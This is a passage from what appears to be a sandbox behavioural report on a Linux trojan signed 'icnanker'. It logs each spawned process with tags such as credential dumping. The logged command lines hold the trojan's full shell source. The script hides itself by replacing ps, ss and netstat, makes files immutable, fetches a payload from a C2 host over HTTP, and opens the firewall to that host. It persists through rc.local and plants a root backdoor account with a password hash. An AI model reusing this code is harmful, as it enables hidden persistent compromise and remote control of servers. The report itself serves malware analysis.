/etc/hosts.allow;cp -f \$allow /etc/hosts.allow;lockr +i /etc/hosts.allow >/dev/null 2>&1 lockr -i /etc/init.d/;lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config;lockr +i \$Config >/dev/null 2>&1 sleep 1;lockr -i /usr/bin/;cp -f \$0 \$bashpath;chmod 777 \$bashpath;nohup \$bashpath >/dev/null 2>&1 & lockr -i /bin/;lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/rc.local;sed -i \"s|\$bashtemp start|\$bashpath start|\" /etc/rc.local # by icnanker ----------------------------------------------- lockr -i \$0 rm -f \$0 exit" /usr/bin/fd7c90b56a
    3⤵
    - File and Directory Permissions Modification
    - Writes DNS configuration
    - Writes file to system bin folder
    PID:2867
  - - /usr/bin/.locks
      .locks -i /usr/bin/lockr
      4⤵
      PID:2876
  - - /usr/bin/chmod
      chmod 777 /usr/bin/lockr
      4⤵
      File and Directory Permissions Modification
      PID:2878
  - - /usr/bin/lockr
      lockr +i /usr/bin/lockr
      4⤵
      PID:2880
  - - /usr/bin/lockr
      lockr -i /usr/bin/dget
      4⤵
      PID:2881
  - - /usr/bin/chmod
      chmod 777 /usr/bin/dget
      4⤵
      File and Directory Permissions Modification
      PID:2882
  - - /usr/bin/lockr
      lockr +i /usr/bin/dget
      4⤵
      PID:2883
  - - /usr/bin/lockr
      lockr -i /usr/bin/pkill
      4⤵
      PID:2884
  - - /usr/bin/chmod
      chmod 777 /usr/bin/pkill
      4⤵
      File and Directory Permissions Modification
      PID:2885
  - - /usr/bin/lockr
      lockr +i /usr/bin/pkill
      4⤵
      PID:2886
  - - /usr/bin/lockr
      lockr -i /usr/bin/nohup
      4⤵
      PID:2887
  - - /usr/bin/chmod
      chmod 777 /usr/bin/nohup
      4⤵
      File and Directory Permissions Modification
      PID:2888
  - - /usr/bin/lockr
      lockr +i /usr/bin/nohup
      4⤵
      PID:2889
  - - /usr/bin/lockr
      lockr -i /usr/bin/killall
      4⤵
      PID:2890
  - - /usr/bin/chmod
      chmod 777 /usr/bin/killall
      4⤵
      File and Directory Permissions Modification
      PID:2891
  - - /usr/bin/lockr
      lockr +i /usr/bin/killall
      4⤵
      PID:2892
  - - /usr/bin/lockr
      lockr -i /usr/bin/nslookup
      4⤵
      PID:2893
  - - /usr/bin/chmod
      chmod 777 /usr/bin/nslookup
      4⤵
      File and Directory Permissions Modification
      PID:2894
  - - /usr/bin/lockr
      lockr +i /usr/bin/nslookup
      4⤵
      PID:2895
  - - /usr/bin/cat
      cat /etc/long.conf
      4⤵
      PID:2897
  - - /usr/bin/awk
      awk "{print \$1}"
      4⤵
      PID:2898
  - - /usr/bin/date
      date "+%s%N"
      4⤵
      PID:2900
  - - /usr/bin/md5sum
      md5sum
      4⤵
      PID:2901
  - - /usr/bin/head
      head -c 10
      4⤵
      PID:2902
  - - /usr/bin/cat
      cat /etc/long.conf
      4⤵
      PID:2904
  - - /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:2905
  - - /usr/bin/date
      date "+%s%N"
      4⤵
      PID:2907
  - - /usr/bin/md5sum
      md5sum
      4⤵
      PID:2908
  - - /usr/bin/head
      head -c 10
      4⤵
      PID:2909
  - - /usr/bin/nslookup
      nslookup top.t7ux.com
      4⤵
      Reads CPU attributes
      PID:2911
  - - /usr/bin/grep
      grep "Address: "
      4⤵
      PID:2912
  - - /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:2913
  - - /usr/bin/lockr
      lockr -i /etc/
      4⤵
      PID:2918
  - - /usr/bin/lockr
      lockr -i /etc/resolv.conf
      4⤵
      PID:2919
  - - /usr/bin/lockr
      lockr +i /etc/resolv.conf
      4⤵
      PID:2920
  - - /usr/sbin/service
      service network restart
      4⤵
      PID:2921
    - - /usr/bin/basename
        
        basename /usr/sbin/service
        5⤵
        
        PID:2922
    - - /usr/bin/basename
        
        basename /usr/sbin/service
        5⤵
        
        PID:2923
  - - /usr/local/sbin/systemctl
      systemctl restart network.service
      4⤵
      PID:2921
  - - /usr/local/bin/systemctl
      systemctl restart network.service
      4⤵
      PID:2921
  - - /usr/sbin/systemctl
      systemctl restart network.service
      4⤵
      PID:2921
  - - /usr/bin/systemctl
      systemctl restart network.service
      4⤵
      PID:2921
  - - /usr/bin/sleep
      sleep 1
      4⤵
      PID:2924
  - - /usr/bin/nslookup
      nslookup top.t7ux.com
      4⤵
      Reads CPU attributes
      PID:2926
  - - /usr/bin/grep
      grep "Address: "
      4⤵
      PID:2927
  - - /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:2928
  - - /usr/bin/cat
      cat /bin/ss
      4⤵
      PID:2934
  - - /usr/bin/grep
      grep
      4⤵
      PID:2935
  - - /usr/bin/lockr
      lockr -i /bin/
      4⤵
      PID:2936
  - - /usr/bin/lockr
      lockr -i /bin/ss
      4⤵
      PID:2937
  - - /usr/bin/chmod
      chmod 777 /bin/ss
      4⤵
      File and Directory Permissions Modification
      PID:2938
  - - /usr/bin/lockr
      lockr +i /bin/ss
      4⤵
      PID:2939
  - - /usr/bin/cat
      cat /bin/ps
      4⤵
      PID:2941
  - - /usr/bin/grep
      grep "#!/bin/sh"
      4⤵
      PID:2942
  - - /usr/bin/grep
      grep ACCEPT
      4⤵
      PID:2946
  - - /usr/bin/grep
      grep
      4⤵
      PID:2945
  - - /usr/bin/ips
      ips -ef
      4⤵
      Checks CPU configuration
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      Reads runtime system information
      System Network Configuration Discovery
      PID:2948
  - - /usr/bin/grep
      grep eb71db4869
      4⤵
      PID:2949
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:2950
  - - /usr/bin/wc
      wc -l
      4⤵
      PID:2951
  - - /usr/bin/lockr
      lockr -i /usr/bin/
      4⤵
      PID:2952
  - - /usr/bin/lockr
      lockr -i /usr/bin/Drkv
      4⤵
      PID:2953
  - - /usr/bin/rm
      rm -f /usr/bin/Drkv
      4⤵
      PID:2954
  - - /usr/bin/dget
      dget http://:6513/Drkv
      4⤵
      PID:2955
  - - /usr/bin/mv
      mv -f /usr/bin/Drkv /usr/bin/e5872a36b4
      4⤵
      PID:2956
  - - /usr/bin/grep
      grep :9506
      4⤵
      PID:2959
  - - /usr/bin/cut
      cut -d / -f 1
      4⤵
      PID:2960
  - - /usr/bin/awk
      awk "{print \$9}"
      4⤵
      PID:2961
  - - /usr/bin/killall
      killall eb71db4869
      4⤵
      Reads runtime system information
      PID:2962
  - - /usr/bin/pkill
      pkill eb71db4869
      4⤵
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:2963
  - - /usr/bin/lockr
      lockr -i /usr/bin/
      4⤵
      PID:2964
  - - /usr/bin/lockr
      lockr -i /usr/bin/eb71db4869
      4⤵
      PID:2965
  - - /usr/bin/rm
      rm -f /usr/bin/eb71db4869
      4⤵
      PID:2966
  - - /usr/bin/cat
      cat /etc/long.conf
      4⤵
      PID:2968
  - - /usr/bin/grep
      grep eb71db4869
      4⤵
      PID:2969
  - - /usr/bin/lockr
      lockr -i /etc/long.conf
      4⤵
      PID:2970
  - - /usr/bin/sed
      sed -i "s|eb71db4869|e5872a36b4|" /etc/long.conf
      4⤵
      PID:2971
  - - /usr/bin/lockr
      lockr +i /etc/long.conf
      4⤵
      PID:2972
  - - /usr/bin/cat
      cat /bin/ps
      4⤵
      PID:2974
  - - /usr/bin/grep
      grep eb71db4869
      4⤵
      PID:2975
  - - /usr/bin/lockr
      lockr -i /bin/ps
      4⤵
      PID:2976
  - - /usr/bin/sed
      sed -i "s|eb71db4869|e5872a36b4|" /bin/ps
      4⤵
      Writes file to system bin folder
      PID:2977
  - - /usr/bin/lockr
      lockr +i /bin/ps
      4⤵
      PID:2978
  - - /usr/bin/chmod
      chmod 777 /usr/bin/e5872a36b4
      4⤵
      File and Directory Permissions Modification
      PID:2979
  - - /usr/bin/cp
      cp -f /usr/bin/e5872a36b4 /usr/bin/longbak
      4⤵
      PID:2981
  - - /usr/bin/nohup
      nohup /usr/bin/e5872a36b4
      4⤵
      PID:2980
  - - /usr/bin/e5872a36b4
      /usr/bin/e5872a36b4
      4⤵
      PID:2980
  - - /usr/bin/chmod
      chmod 777 /usr/bin/longbak
      4⤵
      File and Directory Permissions Modification
      PID:2982
  - - /usr/bin/lockr
      lockr +i /usr/bin/longbak
      4⤵
      PID:2983
  - - /usr/bin/cat
      cat /etc/rc.local
      4⤵
      PID:2985
  - - /usr/bin/grep
      grep start
      4⤵
      PID:2986
  - - /usr/bin/wc
      wc -l
      4⤵
      PID:2987
  - - /usr/bin/cat
      cat /etc/rc.local
      4⤵
      PID:2989
  - - /usr/bin/grep
      grep /usr/bin/fd7c90b56a
      4⤵
      PID:2990
  - - /usr/bin/nslookup
      nslookup sh.7ex.me
      4⤵
      Reads CPU attributes
      PID:2992
  - - /usr/bin/grep
      grep "Address: "
      4⤵
      PID:2993
  - - /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:2994
  - - /usr/bin/cat
      cat /etc/passwd
      4⤵
      PID:3015
  - - /usr/bin/grep
      grep icnanker
      4⤵
      PID:3016
  - - /usr/bin/cat
      cat /etc/shadow
      4⤵
      OS Credential Dumping
      PID:3018
  - - /usr/bin/grep
      grep icnanker
      4⤵
      PID:3019
  - - /usr/bin/killall
      killall .sshd
      4⤵
      Reads runtime system information
      PID:3020
  - - /usr/bin/pkill
      pkill .sshd
      4⤵
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:3021
  - - /usr/bin/lockr
      lockr -i /usr/bin/.sshd
      4⤵
      PID:3022
  - - /usr/bin/rm
      rm -f /usr/bin/.sshd
      4⤵
      PID:3023
  - - /usr/bin/lockr
      lockr -i /usr/bin/
      4⤵
      PID:3024
  - - /usr/bin/lockr
      lockr -i /usr/bin/wget
      4⤵
      PID:3025
  - - /usr/bin/rm
      rm -f /usr/bin/wget
      4⤵
      PID:3026
  - - /usr/bin/lockr
      lockr -i /usr/bin/chattr
      4⤵
      PID:3027
  - - /usr/bin/rm
      rm -f /usr/bin/chattr
      4⤵
      PID:3028
  - - /usr/bin/lockr
      lockr -i /etc/
      4⤵
      PID:3029
  - - /usr/bin/lockr
      lockr -i /etc/hosts.deny
      4⤵
      PID:3030
  - - /usr/bin/cp
      cp -f /etc/deny.bak /etc/hosts.deny
      4⤵
      PID:3031
  - - /usr/bin/lockr
      lockr +i /etc/hosts.deny
      4⤵
      PID:3032
  - - /usr/bin/lockr
      lockr -i /etc/
      4⤵
      PID:3033
  - - /usr/bin/lockr
      lockr -i /etc/hosts.allow
      4⤵
      PID:3034
  - - /usr/bin/cp
      cp -f /etc/allow.bak /etc/hosts.allow
      4⤵
      PID:3035
  - - /usr/bin/lockr
      lockr +i /etc/hosts.allow
      4⤵
      PID:3036
  - - /usr/bin/lockr
      lockr -i /etc/init.d/
      4⤵
      PID:3037
  - - /usr/bin/lockr
      lockr -i /etc/long.conf
      4⤵
      PID:3038
  - - /usr/bin/sed
      sed -i "s|fd7c90b56a|15cd17e5d6|" /etc/long.conf
      4⤵
      PID:3039
  - - /usr/bin/lockr
      lockr +i /etc/long.conf
      4⤵
      PID:3040
  - - /usr/bin/sleep
      sleep 1
      4⤵
      PID:3041
  - - /usr/bin/lockr
      lockr -i /usr/bin/
      4⤵
      PID:3042
  - - /usr/bin/cp
      cp -f /usr/bin/fd7c90b56a /usr/bin/15cd17e5d6
      4⤵
      Write file to user bin folder
      PID:3043
  - - /usr/bin/chmod
      chmod 777 /usr/bin/15cd17e5d6
      4⤵
      File and Directory Permissions Modification
      PID:3044
  - - /usr/bin/lockr
      lockr -i /bin/
      4⤵
      PID:3046
  - - /usr/bin/nohup
      nohup /usr/bin/15cd17e5d6
      4⤵
      PID:3045
  - - /usr/bin/lockr
      lockr -i /bin/ps
      4⤵
      PID:3047
  - - /usr/bin/15cd17e5d6
      /usr/bin/15cd17e5d6
      4⤵
      PID:3045
  - - /usr/bin/sed
      sed -i "s|fd7c90b56a|15cd17e5d6|" /bin/ps
      4⤵
      Writes file to system bin folder
      PID:3048
  - - /usr/bin/lockr
      lockr +i /bin/ps
      4⤵
      PID:3049
  - - /bin/sh
      /usr/bin/15cd17e5d6 -c "exec '/usr/bin/15cd17e5d6' \"\$@\"" /usr/bin/15cd17e5d6
      4⤵
      PID:3045
  - - /usr/bin/15cd17e5d6
      /usr/bin/15cd17e5d6
      4⤵
      PID:3045
  - - /usr/bin/lockr
      lockr -i /etc/
      4⤵
      PID:3050
  - - /usr/bin/lockr
      lockr -i /etc/rc.local
      4⤵
      PID:3051
  - - /usr/bin/sed
      sed -i "s|/usr/bin/fd7c90b56a start|/usr/bin/15cd17e5d6 start|" /etc/rc.local
      4⤵
      PID:3052
  - - /bin/sh
      /usr/bin/15cd17e5d6 -c "#!/bin/sh path=`pwd` exit0=\"exit 0\" ips=\"/usr/bin/ips\" iss=\"/usr/bin/iss\" Net=\"/usr/bin/nets\" Get=\"/usr/bin/dget\" Lok=\"/usr/bin/lockr\" deny=\"/etc/deny.bak\" allow=\"/etc/allow.bak\" Config=\"/etc/long.conf\" filebak=\"/usr/bin/longbak\" issbak=\"/usr/bin/dpkgd/ss\" ipsbak=\"/usr/bin/dpkgd/ps\" Netbak=\"/usr/bin/dpkgd/netstat\" Runkillallconnect() { killpid=`nets -anept 2>/dev/null|grep \"\$Address:9506\"|cut -d / -f 1|awk '{print \$9}'` kill \$killpid 2>/dev/null;kill -3 \$killpid 2>/dev/null;kill -9 \$killpid 2>/dev/null killall \$tempfile;pkill \$tempfile;lockr -i /usr/bin/;lockr -i \$filetemp;rm -f \$filetemp if [ -z \"`cat \$Config|grep \$tempfile`\" ]; then lockr -i /etc/init.d/;lockr -i \$Config echo \$filename \$tempbash \$Address > \$Config;lockr +i \$Config >/dev/null 2>&1 else lockr -i \$Config;sed -i \"s|\$tempfile|\$filename|\" \$Config;lockr +i \$Config >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps|grep \$tempfile`\" ]; then lockr -i /bin/;lockr -i /bin/ps;echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg|grep -v \"'\$tempbash'\"|grep -v \"'\$filename'\"|grep -v \"ips\"|grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 else lockr -i /bin/ps;sed -i \"s|\$tempfile|\$filename|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi } # ------------------------------------------------------------- if [ ! -f \"\$Lok\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install e2fsprogs;fi if [ -f /usr/bin/apt-get ];then apt-get -y install e2fsprogs;fi fi cp -f /usr/bin/chattr /usr/bin/lockr cp -f /usr/bin/chattr /usr/bin/.locks cp -f /usr/bin/.locks /usr/bin/lockr chmod 777 /usr/bin/lockr chmod 777 /usr/bin/.locks lockr +i /usr/bin/lockr >/dev/null 2>&1 lockr +i /usr/bin/.locks >/dev/null 2>&1 else .locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr lockr +i /usr/bin/lockr >/dev/null 2>&1 fi if [ ! -f \"\$Get\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install wget;fi if [ -f /usr/bin/apt-get ];then apt-get -y install wget;fi fi cp -f /usr/bin/wget /usr/bin/dget cp -f /usr/bin/wget /usr/bin/.bget cp -f /usr/bin/.bget /usr/bin/dget chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 lockr +i /usr/bin/.bget >/dev/null 2>&1 else lockr -i /usr/bin/dget;chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 fi if [ -f /usr/bin/pkill ];then lockr -i /usr/bin/pkill;chmod 777 /usr/bin/pkill lockr +i /usr/bin/pkill >/dev/null 2>&1 fi if [ -f /usr/bin/nohup ];then lockr -i /usr/bin/nohup;chmod 777 /usr/bin/nohup lockr +i /usr/bin/nohup >/dev/null 2>&1 fi if [ -f /usr/bin/killall ];then lockr -i /usr/bin/killall;chmod 777 /usr/bin/killall lockr +i /usr/bin/killall >/dev/null 2>&1 fi if [ -f /usr/bin/nslookup ];then lockr -i /usr/bin/nslookup;chmod 777 /usr/bin/nslookup lockr +i /usr/bin/nslookup >/dev/null 2>&1 fi if [ -f /etc/init.d/Me8ing.conf ];then Runkillallconnect rm -f \$0;exit fi # ------------------------------------------------------------- if [ ! -f \"\$Config\" ];then intranet=`ifconfig|grep 'inet '|grep -v '127.0'|xargs|awk -F '[ :]' '{print \$3}'|grep '192.168'` if [ \$intranet ];then exit;fi lockr -i /usr/bin/;lockr -i /etc/init.d/ echo \"byicnanker 2228668564\" > \$Config tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� else tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� if [ \$0 != \"\$bashtemp\" ];then lockr -i /usr/bin/;lockr -i /bin/ KA=`cat \$Config | awk '{print \$1}'` KPidA=`ips -ef|grep \$KA|awk '{print \$2}'` lockr -i /usr/bin/\$KA;rm -f /usr/bin/\$KA kill \$KPidA 2>/dev/null;kill -9 \$KPidA 2>/dev/null lockr -i \$filetemp;rm -f \$filetemp;lockr -i \$filebak;rm -f \$filebak killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd killall \$KA;pkill \$KA;killall \$KA;pkill \$KA;sleep 0.1 K1=`cat \$Config | awk '{print \$2}'` KPid1=`ips -ef|grep \$K1|awk '{print \$2}'` kill \$KPid1 2>/dev/null;kill -9 \$KPid1 2>/dev/null lockr -i /usr/bin/\$K1;rm -f /usr/bin/\$K1 killall \$K1;pkill \$K1;killall \$K1;pkill \$K1;sleep 0.4 K2=`cat \$Config | awk '{print \$2}'` KPid2=`ips -ef|grep \$K2|awk '{print \$2}'` kill \$KPid2 2>/dev/null;kill -9 \$KPid2 2>/dev/null lockr -i /usr/bin/\$K2;rm -f /usr/bin/\$K2 killall \$K2;pkill \$K2;killall \$K2;pkill \$K2;sleep 1.2 K3=`cat \$Config | awk '{print \$2}'` KPid3=`ips -ef|grep \$K3|awk '{print \$2}'` kill \$KPid3 2>/dev/null;kill -9 \$KPid3 2>/dev/null lockr -i /usr/bin/\$K3;rm -f /usr/bin/\$K3 killall \$K3;pkill \$K3;killall \$K3;pkill \$K3;sleep 0.5 K4=`cat \$Config | awk '{print \$2}'` KPid4=`ips -ef|grep \$K4|awk '{print \$2}'` kill \$KPid4 2>/dev/null;kill -9 \$KPid4 2>/dev/null lockr -i /usr/bin/\$K4;rm -f /usr/bin/\$K4 killall \$K4;pkill \$K4;killall \$K4;pkill \$K4;sleep 1.3 K5=`cat \$Config | awk '{print \$2}'` KPid5=`ips -ef|grep \$K5|awk '{print \$2}'` kill \$KPid5 2>/dev/null;kill -9 \$KPid5 2>/dev/null lockr -i /usr/bin/\$K5;rm -f /usr/bin/\$K5 killall \$K5;pkill \$K5;killall \$K5;pkill \$K5;sleep 0.6 K6=`cat \$Config | awk '{print \$2}'` KPid6=`ips -ef|grep \$K6|awk '{print \$2}'` kill \$KPid6 2>/dev/null;kill -9 \$KPid6 2>/dev/null lockr -i /usr/bin/\$K6;rm -f /usr/bin/\$K6 killall \$K6;pkill \$K6;killall \$K6;pkill \$K6;sleep 1.4 K7=`cat \$Config | awk '{print \$2}'` KPid7=`ips -ef|grep \$K7|awk '{print \$2}'` kill \$KPid7 2>/dev/null;kill -9 \$KPid7 2>/dev/null lockr -i /usr/bin/\$K7;rm -f /usr/bin/\$K7 killall \$K7;pkill \$K7;killall \$K7;pkill \$K7;sleep 0.1 lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps fi fi # ------------------------------------------------------------- if [ ! -f /usr/bin/nslookup ];then if [ -f /usr/bin/apt-get ];then apt-get -y install dnsutils;fi if [ -f /usr/bin/yum ];then yum -y install bind-utils;fi fi ResolveIP=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` if [ -z \"\$ResolveIP\" ];then lockr -i /etc/;lockr -i /etc/resolv.conf echo 'nameserver 114.114.114.114' > /etc/resolv.conf echo 'nameserver 8.8.8.8' >> /etc/resolv.conf echo 'nameserver 8.8.4.4' >> /etc/resolv.conf lockr +i /etc/resolv.conf >/dev/null 2>&1 service network restart;sleep 1 Address=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` else Address=\"\$ResolveIP\" fi # ------------------------------------------------------------- if [ -f /bin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ss \$issbak cp -f /bin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ss | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/ss echo '#!/bin/sh' > /bin/ss echo 'iss|grep -v \"'\$Address'\"' >> /bin/ss echo 'exit' >> /bin/ss chmod 777 /bin/ss;lockr +i /bin/ss >/dev/null 2>&1 fi fi fi if [ -f /usr/sbin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /usr/sbin/ss \$issbak cp -f /usr/sbin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /usr/sbin/ss | grep \$Address`\" ]; then lockr -i /usr/sbin/;lockr -i /usr/sbin/ss echo '#!/bin/sh' > /usr/sbin/ss echo 'iss|grep -v \"'\$Address'\"' >> /usr/sbin/ss echo 'exit' >> /usr/sbin/ss chmod 777 /usr/sbin/ss;lockr +i /usr/sbin/ss >/dev/null 2>&1 fi fi fi if [ -f /bin/netstat ];then if [ ! -f \"\$Net\" ];then if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/netstat \$Netbak cp -f /bin/netstat \$Net else cp -f \$Netbak \$Net fi chmod 777 \$Net;chmod 777 \$Netbak lockr +i \$Netbak >/dev/null 2>&1 lockr +i \$Net >/dev/null 2>&1 else if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;cp -f \$Net \$Netbak lockr +i \$Netbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/netstat | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/netstat echo '#!/bin/sh' > /bin/netstat echo 'for arg in \"\$*\";do' >> /bin/netstat echo 'nets \$arg | grep -v \"'\$Address'\"' >> /bin/netstat echo 'done;exit' >> /bin/netstat chmod 777 /bin/netstat;lockr +i /bin/netstat >/dev/null 2>&1 fi fi fi if [ -f /bin/ps ];then if [ ! -f \"\$ips\" ];then if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ps \$ipsbak cp -f /bin/ps \$ips else cp -f \$ipsbak \$ips fi chmod 777 \$ips;chmod 777 \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 lockr +i \$ips >/dev/null 2>&1 else if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;cp -f \$ips \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps | grep '#!/bin/sh'`\" ]; then lockr -i /bin/;lockr -i /bin/ps echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg | grep -v \"'\$tempbash'\" | grep -v \"'\$tempfile'\" | grep -v \"ips\" | grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi fi fi if [ ! -f \"\$deny\" ];then lockr -i /etc/;cp -f /etc/hosts.deny \$deny lockr +i \$deny >/dev/null 2>&1 fi if [ ! -f \"\$allow\" ];then lockr -i /etc/;cp -f /etc/hosts.allow \$allow lockr +i \$allow >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- iptable=`iptables -L INPUT | grep \"\$Address\" | grep 'ACCEPT'` if [ -z \"\$iptable\" ];then iptables -I INPUT -s \$Address -j ACCEPT else iptables -D INPUT -s \$Address -j DROP fi process=`ips -ef | grep \"\$tempfile\" | grep -v \"grep\" | wc -l` if [ \$process != 1 ];then if [ ! -f \"\$filebak\" ];then lockr -i /usr/bin/;lockr -i /usr/bin/Drkv;rm -f /usr/bin/Drkv cd /usr/bin/;dget http://\$Address:6513/Drkv cd \$path;mv -f /usr/bin/Drkv \$filepath else cp -f \$filebak \$filepath fi Runkillallconnect chmod 777 \$filepath nohup \$filepath >/dev/null 2>&1 & fi if [ ! -f \"\$filebak\" ];then cp -f \$filepath \$filebak;chmod 777 \$filebak lockr +i \$filebak >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l` if [ \$Repeatstart != 1 ];then lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local fi if [ -z \"`cat /etc/rc.local | grep \"\$bashtemp\"`\" ]; then if [ -z \"`cat /etc/rc.local | grep \"\$exit0\"`\" ]; then lockr -i /etc/;lockr -i /etc/rc.local echo \"\$bashpath start\" >> /etc/rc.local else lockr -i /etc/;lockr -i /etc/rc.local sed -i \"s|exit 0|\$bashpath start|\" /etc/rc.local echo \"exit 0\">>/etc/rc.local fi fi # by icnanker ----------------------------------------------- if [ ! -f /tmp/bash.log ];then UpdateIP=`nslookup sh.7ex.me|grep \"Address: \"|awk '{print \$2}'` if [ ! -z \"\$UpdateIP\" ];then lockr -i /tmp/;lockr -i /tmp/bash.log;rm -f /tmp/bash.log cd /tmp/;dget http://\$UpdateIP:5155/update.log cd \$path;mv -f /tmp/update.log /tmp/bash.log fi fi if [ -z \"`cat /etc/passwd|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/passwd #icnanker echo 'icnanker:x:0:1:icnanker:/root:/bin/bash' >> /etc/passwd fi if [ -z \"`cat /etc/shadow|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/shadow #ddos@nanker echo 'icnanker:\$6\$14nPldFS\$xcNbGMouKo..dH8idyM6D0RIpXVnVm.5B.qORnV6qqnW4V.Ru3IGGyhiNzKAWRee7hJtCXW8vhApM1bzAm54n.:16570:0:99999:7:::' >> /etc/shadow fi # by icnanker ----------------------------------------------- killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd lockr -i /usr/bin/;lockr -i /usr/bin/wget;rm -f /usr/bin/wget;lockr -i /usr/bin/chattr;rm -f /usr/bin/chattr lockr -i /etc/;lockr -i /etc/hosts.deny;cp -f \$deny /etc/hosts.deny;lockr +i /etc/hosts.deny >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/hosts.allow;cp -f \$allow /etc/hosts.allow;lockr +i /etc/hosts.allow >/dev/null 2>&1 lockr -i /etc/init.d/;lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config;lockr +i \$Config >/dev/null 2>&1 sleep 1;lockr -i /usr/bin/;cp -f \$0 \$bashpath;chmod 777 \$bashpath;nohup \$bashpath >/dev/null 2>&1 & lockr -i /bin/;lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/rc.local;sed -i \"s|\$bashtemp start|\$bashpath start|\" /etc/rc.local # by icnanker ----------------------------------------------- lockr -i \$0 rm -f \$0 exit" /usr/bin/15cd17e5d6
      4⤵
      File and Directory Permissions Modification
      Writes DNS configuration
      PID:3045
    - - /usr/bin/.locks
        
        .locks -i /usr/bin/lockr
        5⤵
        
        PID:3054
    - - /usr/bin/chmod
        
        chmod 777 /usr/bin/lockr
        5⤵
        File and Directory Permissions Modification
        
        PID:3056
    - - /usr/bin/lockr
        
        lockr +i /usr/bin/lockr
        5⤵
        
        PID:3058
    - - /usr/bin/lockr
        
        lockr -i /usr/bin/dget
        5⤵
        
        PID:3059
    - - /usr/bin/chmod
        
        chmod 777 /usr/bin/dget
        5⤵
        File and Directory Permissions Modification
        
        PID:3060
    - - /usr/bin/lockr
        
